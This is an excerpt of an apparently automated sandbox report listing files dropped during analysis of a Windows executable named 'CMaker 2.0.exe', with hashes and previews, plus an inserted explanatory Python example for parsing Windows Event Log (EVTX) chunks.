SHA-256:CCDF6F2CA947C96970A0B63EEC1F8CCD753549B2FC6CED8E0C0AB54BEE2AE027
SHA-512:F1900F302272A5319682D7E4B3AA8911DE337EB4059FEB97FB5DD4E25078CB961DEB49C8FF273C82693C3B5867FD9247ED3F2D22AAB5F9F9361BF0CC4004523C
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):78952
Entropy (8bit):4.430344397647226
Encrypted:false
SSDEEP:384:Nh9SeSlSvcxSZS7SOMUYsMBY8MdYSMdYQMdYeKLKGK6KQK2K1K52KaK7KlPKRKPX:NlcwQpI/llcN
MD5:7A14ABCF4551C7BEB4C8A6C0F9C21C9A
SHA1:6A9C78BD6196D8F4DE93056804D8EB693BC8A2DF
SHA-256:440961B2ECD30DD676B4873CB6A47609183BC091C1D351321098F2B5BCBB5134
SHA-512:37C0BE88DFCA4832C222000B28AE1889995ACC09B9CC1ED6D9D099E38BB6B239D18490E240A86D4EDD18F309BF8CE874F200FBDAB0ECDF1C9F779932867974AC
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):1.2305573051374772
Encrypted:false
SSDEEP:384:phL6UsE0ZUmxUmgDUmSUmKUmgUmlUmB8UmCUmeUmfPUmD+UmxUmBUmxUm:pY7LM
MD5:38DDC0D6E2F296743CF4A3E22830F8ED
SHA1:FAA40792E1A6F8AD8CD1EC6EC61E9C0232C20D11
SHA-256:886F12875E0B1F98D5A61C42D96B95F0F8C992DC0F77E428B0CED2CC030913D2
SHA-512:41C548C0D81C02855C71ACCDDCD8B75232459A5C405B94FAA7743495B142F9D1B7F10A7D2F47DB8845E1A5B4987D71BD4728A62B02CE14C248804460C2D32369
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):0.20408194875969177
Encrypted:false
SSDEEP:48:MgX8WWzvrP+wTQNRBEZWTENO4bPBFoL/6a:jXyBUNVaO87oL/6a
MD5:E6DBFB740365524EAA8431D272B58B0A
SHA1:A0A8044BCB4F0CE74BC97B679949374E9C308D90
SHA-256:8EC33CFDF5186455337851AC7516584799519E421F86DD7621A583B89593E330
SHA-512:D8D44CD6A570387159A2EC042950B73D8B11180F0F2E27E43888A1D29A4C0EC7BEDC3A37EF646E9B3D928F5ABAB0F7F6A970815CB8A0747667F5BE9B35223051
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):4.081454356890361
Encrypted:false
SSDEEP:384:OhMiv9i6ri+Hi7EibniWihKixiTijKiFi5iuiUioifiN8ixiEixihiliYi9niO8t:OfNa/xQM9QSp
MD5:F38DD63F1596D1039571A5D80A147980
SHA1:278553D5556ACBAF4E671C41F9A930CA0D253F11
SHA-256:5AC3EDCEBF4CC25A645D62044E94FD695452E12A72D3500D98898E3F766C4875
SHA-512:F6CE9DDF2D6888FB2DBB4C17544E632D8D5057B3C96577F70AD6F3B8EEA84274BFE092D94A0F3D2965DAD553209652AB5A28778C88DF9FDB5A8FA3E7D1EC8FFC
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):3.389134573891169
Encrypted:false
SSDEEP:768:zhaon9a3aHaPabaHavaraXaTavabafavaDanaja/aLaHa/aHaj4EavaDanava/aS:5nI
MD5:13C7CBFA759979C84C4BD8DF91D148D6
SHA1:1D29C8F5C438174E738D49A7E015718325571366
SHA-256:73F32D86C169B39E858959691EF71727B535C438C5D6125BC51F24BEE01AF4C8
SHA-512:8A0E471FDE6AE77E9AB71585BE14E0673F63AD87803E67BE026D5FB93632B477CCDE0EE7AE5C06026E146FAE1FD45B8D5381F44537D40DE224B6D9AFFB477269
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):1.4147866220767469
Encrypted:false
SSDEEP:384:XhaXJb4+XJcXJsXJrXJQXJIXJdXJkXJuXJyXJLMXJ3XJpyXJGXJQXJyXJbXJHXJZ:XQ0yUkNYwD8imLEJpmaYm9ZZ
MD5:5AC69472258A06CCE6D64B90D882DD98
SHA1:FE3AFF211337BBEDDF9E188F419495EDEED10F2D
SHA-256:4E1ABC12F4354A38FB1B34228498C106713E751D06F206EFE76B1013DE3B09BD
SHA-512:EC964437F5B9D0D3AB7CD4EB59C9B1215D22C244099C5F3EEFCB18F4B1F0EDC47FD38D3D83F0306136699C498BBBE3FE9C4489E976A7573DFE3E7427A5123A1E
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):4.335502462229597
Encrypted:false
SSDEEP:384:rhjmrmvm3BmOmbmLmomtmImj5pmHm5mxEmtPmoGmNlmmmCmZmLJmAkm2rmqimtmU:rGX5XDcxXaPv
MD5:55C2C83DABDC93F6135C1875602E337D
SHA1:3E825BFC09D43C9310193ED95D28BCC2C3E157CA
SHA-256:587414170FCD20D1ED1BE71F5FB4D39CD2AA9169F694B51997866F7F20023E18
SHA-512:3660BE713BF840ACF9D2B3E3C621D08B27B0A24E836A787351B777E6052E75BF1FE275C2A543A31C338E03B121D067C206E8D5C64320DB4C917D2E6EC443199F
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):4.343747536559921
Encrypted:false
SSDEEP:384:Yho27s2m2C2i2g2Q2l2Q2A2g2jl2l2E2k28242A2g2U202Q2G2e2O2n2r2X272XF:Yf0mbm
MD5:90EA562392E0A34BDD8BF8CED995478A
SHA1:A8DB3CEB353E018652470C5D146FBB99755644E8
SHA-256:1394D5A46782AED86CB80F8C9C66D05852229CD03138AD825D855AF3365DECFC
SHA-512:6A9F396A0FA4B52589CE8557BCCCDB77DA5236E2FF47A697F3833FCEA2A1AAE7E75AF1E0E05E8E92F5BB0E26D906C51810C2AB0726C16F1D5C85278C3FC57DE4
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:MS Windows Vista Event Log, 1 chunks (no. 0 in use), next record no. 10, DIRTY
Category:dropped
Size (bytes):74504
Entropy (8bit):1.7516600049229736
Encrypted:false
SSDEEP:1536:WucpP9JcY6+g4+Ga62ucpP9JcY6+g4+Ga6:PcpP9JcY6+g4+Ga6vcpP9JcY6+g4+Ga6
MD5:849397D292566ACE8ABE2E55939C848E
SHA1:8B7A181A0858EA2416B457B3E006B2FD1F671833
SHA-256:69717D7E54753E26E29412C3DCD85181CF478B0DB401ED7C1B24EA86E35E4497
SHA-512:86085E85C4E3247B3FD5DF1747C2C57DD37EB9BADA4ACA6C032CC4E6E311988DF58997227A96A2373F1A7376C65EE94464BA01EF34110008929F56A70C08E1B3
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):1024
Entropy (8bit):3.258200525988652
Encrypted:false
SSDEEP:24:MitqIQ0WsjkBtl5rpGN6Ue8Jnc8Jnz45o08:Mbs4BX5X4JfJz45oV
MD5:E9602BC22A2401A6EAE365F010C51F5C
SHA1:A5EC02304A7A074AB49102597701C9F855820F98
SHA-256:D2F893AC0B8F18D582E61593B8DD6D3AC1E1041EC37E76993FE217188199C71A
SHA-512:9597976CF4AD46CC28CBC5B0CA5F30E1CC5F6E4EAA6C83BCBFBF2180CF7B38AF0CDDDCEA3245CD59881800B77174EC6A5425E7D7A99BE1D8654D6A986CEC8D33
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):4.248562733326363
Encrypted:false
SSDEEP:384:ThThquhVh3hfhMhohghrhwhAhS5hqhShmh0hohRhNIh1BwhohGh5h3hShChWhzhM:T80FFpkBQL1
MD5:3B202E0452EBFB9892AEB5D31B114EF9
SHA1:EB516634D8C4E4BC3A1BFF0529DE8084B8C97415
SHA-256:02D362B03A9A229E86546E073260C9F77BBF79142552E0EBE994A4B5EDF1729F
SHA-512:D1B13B90844FFF51F84A84E517DF3B990ED12E13AA375B32A94333059DFAC4D72A309ED3EC830A348AA0011C2FEEEEAD5D4C9CFF6C17A2A7FBDD0B0F8CFC4D0A
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):1.3101945749546235
Encrypted:false
SSDEEP:384:GhOVPiVcVCVC7VNVtVEV3Vob7V5VXVmVbVoV/VEVptVtVBVnVOVAViVhcVSVsVX6:GyjbP
MD5:FFD7548AA8B73513E37AC74F7FC499B7
SHA1:7BAF52151B91BDFA56D12285A88E0AF2BBDA1AD0
SHA-256:418A17FEDA3FCB510EBA4F33A7D7ADDF1DC4FF23E09460BA2E41D92E01393F31
SHA-512:A4BDC043871F8BFC002912A12FB7453CB0EB451F6D35DCE88726B45805F69E0C08999AA83F569826E30520B17935F372D283E94261D0B284850FE8A07618E3D0
Malicious:false
Process:C:\Windows\System32\svchost.exe
File Type:data
Category:dropped
Size (bytes):65536
Entropy (8bit):4.303320368330565
Encrypted:false
SSDEEP:384:ahxBwBuBwBOXBwByXyBwB6BwBLBwB6BwB6BwBEBwB01BwBfw/D7BwBL/iBwBfCbs:avuCbCjDMgBWuh
MD5:C19C605504413AD89ECF612A00233113
SHA1:EA508379FEB3179C3AD19C6A82B6CEF816923237
SHA-256:31DE068CF560B04AE42552A76E60F297B788CB9BFCC8AB6016A4B879EA1A2D55
SHA-512:28852EFD48C6693E2737B48B65538DA86DFA008392327C88BDEB16251C40BF0270E3719A5EF0A910BEF1E7EF44416C21723619D8496B97BCB8433BF068AADBEC
Malicious:false
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):4.415502860476199
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:/hNUEuUEdeUEFUEWUEbUEGUE7eUEt9UE8oUEbPUETaUEEpUESEUED7UEhmUEGlUi:/2qgYE
                                                                                                                                                                                MD5:7750FCF3463E4684F5956C8EF6545615
                                                                                                                                                                                SHA1:673F0508FDFE69CBABABDFDC29133640FA81051E
                                                                                                                                                                                SHA-256:FA412F1DA2F16D58A180E41D4793F4AF3512803C93E3DDA457305473F1CBF2FF
                                                                                                                                                                                SHA-512:6AE0FE662EEFD4ED26D6C40F742706AF38F3D448A92C23DE2986F11D3C7890DA6B5235C716085EA07E048548C429A4E91FE5F2DD422D1B03CCF0EC403E2156FC
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk......................................Z...[......................................................................................................................F...=...........................................................................................................................f...............?...........................m...................M...F...............................................&...................................................................................................**................z W..........Z7;&........Z7;..T.f.m`..L........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..Y............{..P.r.o.v.i.d.e.r...6...F=.......K...N.a.m.e........X.......)...G.u.i.d........A..M...z........a..E.v.e.n.t.I.D...'........X...)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n.....
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):4.316557841670108
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:768:55mbf2948GA6rk6wYfy167tbiikqokbE8noJp285h5oH:Flo
                                                                                                                                                                                MD5:732EC330C9D67225D04822D6F66707FA
                                                                                                                                                                                SHA1:1F0825673BC89A514972B667B4608369F725FD3B
                                                                                                                                                                                SHA-256:BA274B5FBF2820A30BB31BBEEA4FD4463617D5313CCAE7416FDD9AB01890F68D
                                                                                                                                                                                SHA-512:63A6085EB443FFE051713CCD57DA37666D02F5E10CA35950DB9678E8EB9AAC89F37E0D7D07DD3586F20BE4B5E4B4E1F6AB70942FA5E448A9090768A55ADB5C64
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.................r.......{............*...,..........................................................................T..................p...s...h...................=...................................................N...............................................w.......:.......................3...................................a...........).......M...X...:...............................I...........N.......................................................&...........................................**..(...r........Jp..$........Ez.B&.......Ez.Bfa.S...=F.&E.......A..9...M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.....b...........oT..S.y.s.t.e.m....A...............{..P.r.o.v.i.d.e.r.......F=.......K...N.a.m.e.......M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.E.v.e.n.t.l.o.g..........)...G.u.i.d.....&.{.f.c.6.5.d.d.d.8.-.d.6.e.f.-.4.9.6.2.-.8.3.d.5.-.6.e.5.c.f.e.9.c.e.1.
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1200
                                                                                                                                                                                Entropy (8bit):3.038265089527535
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:24:MzjoSQaw4lck4KqMK8ymGY56lxxecSrlulo:MgRCijK9tpgxoP7
                                                                                                                                                                                MD5:7069197322131A520174645233E5CF15
                                                                                                                                                                                SHA1:E4279C7E384BFB4408585D9CB971103B74E67EEC
                                                                                                                                                                                SHA-256:02CEDEFE396C4097F7F4EBC02688E7DEFD3BE6CCF5788B23F6FD47CCA3DAB78C
                                                                                                                                                                                SHA-512:250ED988574B5A616E6E046BAD532955AB575EC57214A989864D7C035C4754586A3990C2E15D8D4EA01441FE441B02B03F6947ED679129769BF1CC8D3BDFD405
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk..................................................................................................................../^]!....................s...h...................=...................................................N...............................................w.......6.......................K...................................]...........).......M...9...:...........................................^...........................[...................................$...................&...............**..............."...$.........Z7;^...............................................................8.............!................@."...$..r.].[..N....W.6/.............................M.i.c.r.o.s.o.f.t.-.W.i.n.d.o.w.s.-.D.N.S.-.C.l.i.e.n.t.n....~.I...x.=.MS.y.s.t.e.m....................@.\...o........................A..)............=.......Q.u.e.r.y.N.a.m.e.......A..1.......#....=.......A.d.d.r.e.s.s.L.e.n.g.t.h.......A..%............=.......A.d.d.r.e.s.s.............@...........f.e.3
                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                File Type:data
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):101704
                                                                                                                                                                                Entropy (8bit):3.764186646507118
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3072:qHtwXHtwdHtw6HtwXHtwdHtw+HtwHHtw:qHtwXHtwdHtw6HtwXHtwdHtw+HtwHHtw
                                                                                                                                                                                MD5:99D19D29390130218FF1FBED1E3933B7
                                                                                                                                                                                SHA1:9A62925D5A877D42B084B2778D6AF552EA171461
                                                                                                                                                                                SHA-256:DD499A6317C5712F0F21723B93FDCE075F2B1DC936EFFD42BD68D54E62041C55
                                                                                                                                                                                SHA-512:82F09738CCC1DC1DD234CC264C4BB3A301D5CC50D58968C61944750E66DCF73922556CA29D44588ECA0FCF3CD4CED7B17808BA4A8452581052F46D26F33616D8
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:ElfChnk.................~...................x`..H......I......................................................................1.............................................=..........................................................................................................................._...............8...........................f...................M...c...........................t...................................................................&...................................................**...1..~........z..$.........*{-&........*{-.elRN.E%.,+.........A......M...........E.v.e.n.t........j...........x.m.l.n.s.....5.h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.n./.2.0.0.4./.0.8./.e.v.e.n.t.s./.e.v.e.n.t.................oT..S.y.s.t.e.m....A..R............{..P.r.o.v.i.d.e.r.../....=.......K...N.a.m.e.......P.o.w.e.r.S.h.e.l.l..A..M...s........a..E.v.e.n.t.I.D...'............)...Q.u.a.l.i.f.i.e.r.s................"...............V.e.r.s.i.o.n............
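The entries above whose previews begin with ElfChnk are not files the sample dropped: ElfChnk is the chunk signature of the Windows Event Log (.evtx) format, the Event Log service runs inside svchost.exe, and the UTF-16 text visible in the previews (the http://schemas.microsoft.com/win/2004/08/events/event namespace, provider names such as PowerShell, Microsoft-Windows-Eventlog and Microsoft-Windows-DNS-Client) is the system logging the sample's own activity. They are still worth reading as evidence of what ran. The parser below is an added example, not code from this report or from Joe Sandbox: it reads the chunk header, verifies the two CRC32s (one over the header and offset tables, one over the record area), walks the 24-byte record headers with their trailing size copy, and pulls printable UTF-16LE runs out of each record body as a cheap substitute for a full BinXML decoder. Field offsets follow the documented EVTX chunk layout; the one-record chunk it builds for the demo, including its provider strings and FILETIME, is constructed and does not correspond to any of the hashes listed above.

```python
"""Parse a Windows Event Log (EVTX) chunk: header, CRC32 checks, record walk.

Added example for reading ElfChnk-prefixed files that a sandbox lists as
"dropped" by svchost.exe. Offsets follow the documented EVTX chunk layout;
the sample chunk built below is constructed, not taken from the report.
"""
import re
import struct
import zlib
from datetime import datetime, timedelta, timezone

CHUNK_SIZE = 0x10000          # every EVTX chunk is exactly 64 KiB
HEADER_SIZE = 0x80            # fixed chunk header
RECORDS_START = 0x200         # header + string/template offset tables
CHUNK_MAGIC = b"ElfChnk\x00"
RECORD_MAGIC = b"**\x00\x00"
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
UTF16_RUN = re.compile(rb"(?:[\x20-\x7e]\x00){4,}")  # 4+ printable UTF-16LE chars


def filetime_to_datetime(filetime: int) -> datetime:
    """Convert a 100 ns-since-1601 FILETIME to an aware UTC datetime."""
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def header_crc(chunk: bytes) -> int:
    """CRC32 over header bytes 0..119 plus the offset tables at 128..511."""
    return zlib.crc32(chunk[:120] + chunk[128:512]) & 0xFFFFFFFF


def parse_chunk(chunk: bytes) -> dict:
    """Return header fields, both checksum verdicts and the parsed records."""
    if len(chunk) != CHUNK_SIZE or chunk[:8] != CHUNK_MAGIC:
        raise ValueError("not an EVTX chunk")
    (first_num, last_num, first_id, last_id,
     hdr_size, last_rec_off, free_off, rec_crc) = struct.unpack_from("<QQQQIIII", chunk, 8)
    flags, hdr_crc = struct.unpack_from("<II", chunk, 120)
    records = []
    off = RECORDS_START
    # Walk records up to the free-space mark; stop at the first malformed one.
    while off + 28 <= free_off and chunk[off:off + 4] == RECORD_MAGIC:
        size, rec_id, written = struct.unpack_from("<IQQ", chunk, off + 4)
        if size < 28 or off + size > free_off:
            break
        trailer = struct.unpack_from("<I", chunk, off + size - 4)[0]
        body = chunk[off + 24:off + size - 4]          # BinXML payload
        records.append({
            "offset": off,
            "record_id": rec_id,
            "written": filetime_to_datetime(written),
            "size_ok": trailer == size,                 # trailing size must match
            "strings": [m.group().decode("utf-16-le") for m in UTF16_RUN.finditer(body)],
        })
        off += size
    return {
        "first_record_number": first_num, "last_record_number": last_num,
        "first_record_id": first_id, "last_record_id": last_id,
        "header_size": hdr_size, "last_record_offset": last_rec_off,
        "free_space_offset": free_off, "flags": flags,
        "header_ok": hdr_crc == header_crc(chunk),
        "records_ok": rec_crc == (zlib.crc32(chunk[RECORDS_START:free_off]) & 0xFFFFFFFF),
        "records": records,
    }


def build_sample_chunk(record_id: int = 7,
                       strings=("Event", "Microsoft-Windows-PowerShell")) -> bytes:
    """Construct a valid one-record chunk (demo data, not from the report).

    NUL-separated UTF-16LE text stands in for the BinXML a real record
    carries; both checksums are filled in the way the Event Log service
    does, so parse_chunk() reports them as OK.
    """
    body = b"".join(s.encode("utf-16-le") + b"\x00\x00" for s in strings)
    size = 24 + len(body) + 4
    body += b"\x00" * (-size % 8)             # records are 8-byte aligned
    size = 24 + len(body) + 4
    written = 133_000_000_000_000_000          # constructed FILETIME (mid-2022)
    record = (RECORD_MAGIC + struct.pack("<IQQ", size, record_id, written)
              + body + struct.pack("<I", size))
    chunk = bytearray(CHUNK_SIZE)
    free_off = RECORDS_START + len(record)
    chunk[RECORDS_START:free_off] = record
    rec_crc = zlib.crc32(bytes(chunk[RECORDS_START:free_off])) & 0xFFFFFFFF
    chunk[:8] = CHUNK_MAGIC
    struct.pack_into("<QQQQIIII", chunk, 8, record_id, record_id, record_id, record_id,
                     HEADER_SIZE, RECORDS_START, free_off, rec_crc)
    struct.pack_into("<I", chunk, 124, header_crc(bytes(chunk)))
    return bytes(chunk)


if __name__ == "__main__":
    info = parse_chunk(build_sample_chunk())
    print("header_ok", info["header_ok"], "records_ok", info["records_ok"])
    for rec in info["records"]:
        print(rec["record_id"], rec["written"].isoformat(), rec["strings"])
```

To run it over a real dropped file, read it in 64 KiB slices and call parse_chunk() on each; a chunk whose records_ok is False has been truncated or modified after the service wrote it, which is itself worth noting in a report. A proper BinXML decoder (for example the python-evtx project) is needed to recover full event XML; the string scan here only surfaces provider names and similar literals.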
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):1835008
                                                                                                                                                                                Entropy (8bit):4.4687336361752275
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:6144:OzZfpi6ceLPx9skLmb0fYZWSP3aJG8nAgeiJRMMhA2zX4WABluuNEjDH5S:QZHtYZWOKnMM6bFpKj4
                                                                                                                                                                                MD5:188EEA9C80FF33FAD1FA176511F352E7
                                                                                                                                                                                SHA1:BAC01B169989069219FE5E1BCA5BD0C4297CF777
                                                                                                                                                                                SHA-256:869B698B6DD394ECA5559BFF5816D878B66C79F602E7EE403A404E6D5BF589F7
                                                                                                                                                                                SHA-512:5F8D033BBDC688B21095313428256B95A8FC12F1D2323EA9D3DC54A55BD54056FB3F07FFE518B73821639CD0C99F387A97346F3E80C0DC28859895DA8824B529
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmV...$..............................................................................................................................................................................................................................................................................................................................................Y..<........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):3444
                                                                                                                                                                                Entropy (8bit):5.011954215267298
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:48:ADPo+gDMIuK54DeHNg9dqbEzCJGGgGDU3XgLBgaGKFijiVJtVAAF/XRgW:ADw+gDMhK54qHC7aBvGKFijiV7XRgW
                                                                                                                                                                                MD5:B133A676D139032A27DE3D9619E70091
                                                                                                                                                                                SHA1:1248AA89938A13640252A79113930EDE2F26F1FA
                                                                                                                                                                                SHA-256:AE2B6236D3EEB4822835714AE9444E5DCD21BC60F7A909F2962C43BC743C7B15
                                                                                                                                                                                SHA-512:C6B99E13D854CE7A6874497473614EE4BD81C490802783DB1349AB851CD80D1DC06DF8C1F6E434ABA873A5BBF6125CC64104709064E19A9DC1C66DCDE3F898F5
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview://////////////////////////////////////////////////////////////////////////////////////////////..//..// Copyright (C) 2000 Microsoft Corporation..//..// Module Name:..// WmiApRpl..//..// Abstract:..//..// Include file for object and counters definitions...//..//////////////////////////////////////////////////////////////////////////////////////////////......#define.WMI_Objects.0..#define.HiPerf_Classes.2..#define.HiPerf_Validity.4....#define.MSiSCSI_ConnectionStatistics_00000.6....#define.BytesReceived_00000.8..#define.BytesSent_00000.10..#define.PDUCommandsSent_00000.12..#define.PDUResponsesReceived_00000.14....#define.MSiSCSI_InitiatorInstanceStatistics_00001.16....#define.SessionConnectionTimeoutErrorCount_00001.18..#define.SessionDigestErrorCount_00001.20..#define.SessionFailureCount_00001.22..#define.SessionFormatErrorCount_00001.24....#define.MSiSCSI_InitiatorLoginStatistics_00002.26....#define.LoginAcceptRsps_00002.28..#define.LoginAuthenticateFails_00002.30..#define.LoginAuthFai
                                                                                                                                                                                Process:C:\Windows\System32\wbem\WMIADAP.exe
                                                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with very long lines (405), with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):48786
                                                                                                                                                                                Entropy (8bit):3.5854495362228453
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:384:esozoNc1+12zG1+b61ubSGMLVrj4+PtC81ZBg4Lg4ung4og4uo91K91zI91K91z2:esozozBg4Lg4ung4og4uWG4MG4o1
                                                                                                                                                                                MD5:DF877BEC5C9E3382E94FEA48FEE049AC
                                                                                                                                                                                SHA1:1D61436C8A1C057C1B1089EB794D90EE4B0D8FE9
                                                                                                                                                                                SHA-256:7F0F3FA64E41A30BACA377B6399F8F7087BC54DA9FCA876BFDC2C2EEECA8454B
                                                                                                                                                                                SHA-512:433CB16EBE2292CB60CB8CE71207EBB752295FB73E6D13E215E771EC5FC433EE29577AF28641255810C18078B95F04A9D37734B6F49CB6A6302821E365672205
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Preview:.././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././....././....././. .C.o.p.y.r.i.g.h.t. .(.C.). .2.0.0.0. .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....././....././. .M.o.d.u.l.e. .N.a.m.e.:....././. .W.m.i.A.p.R.p.l....././....././. .A.b.s.t.r.a.c.t.:....././....././. .D.e.s.c.r.i.b.e.s. .a.l.l. .t.h.e. .c.o.u.n.t.e.r.s. .s.u.p.p.o.r.t.e.d. .v.i.a. .W.M.I. .H.i.-.P.e.r.f.o.r.m.a.n.c.e. .p.r.o.v.i.d.e.r.s....././....././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.............[.i.n.f.o.].....d.r.i.v.e.r.n.a.m.e.=.W.m.i.A.p.R.p.l.....s.y.m.b.o.l.f.i.l.e.=.W.m.i.A.p.R.p.l...h.........[.l.a.n.g.u.a.g.e.s.].....0.0.9.=.E.n.g.l.i.s.h.....0.0.9.=.E.n.g.l.i.s.h.........[.o.b.j.e.c.t.s.].....W.M.I._.O.b.j.e.c.t.s._.0.0.
Process:C:\Users\user\AppData\Local\Temp\CMaker 2.0.exe
File Type:JSON data
Category:dropped
Size (bytes):70
Entropy (8bit):4.4550313667538335
Encrypted:false
SSDEEP:3:rqMBFReNmI4vyGBQUAuF5QEyn:WgMmI4vyGBQP3
MD5:4910EBA8FEADB58A6B57B36FB8FAA4B2
SHA1:8FF8DFE3A1934868D5A78CC1AC16B7BCC68ECFF2
SHA-256:6FD2023731EE30609A099D9481C07792FBB97DEB182CDB18A328A0F1423F54FE
SHA-512:7A0D39DF13404F2F86483C531D7E05730D2EE58A3EE3610B4572A92F3FDF4B6EACD79CE91C2C6C07AABF1325F3D78AF3B87CECAA786A8C78F9EDD368DAC2BC80
Malicious:false
Preview:[1136] Failed to execute script 'CMaker' due to unhandled exception!..
File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):7.983259218873685
TrID:
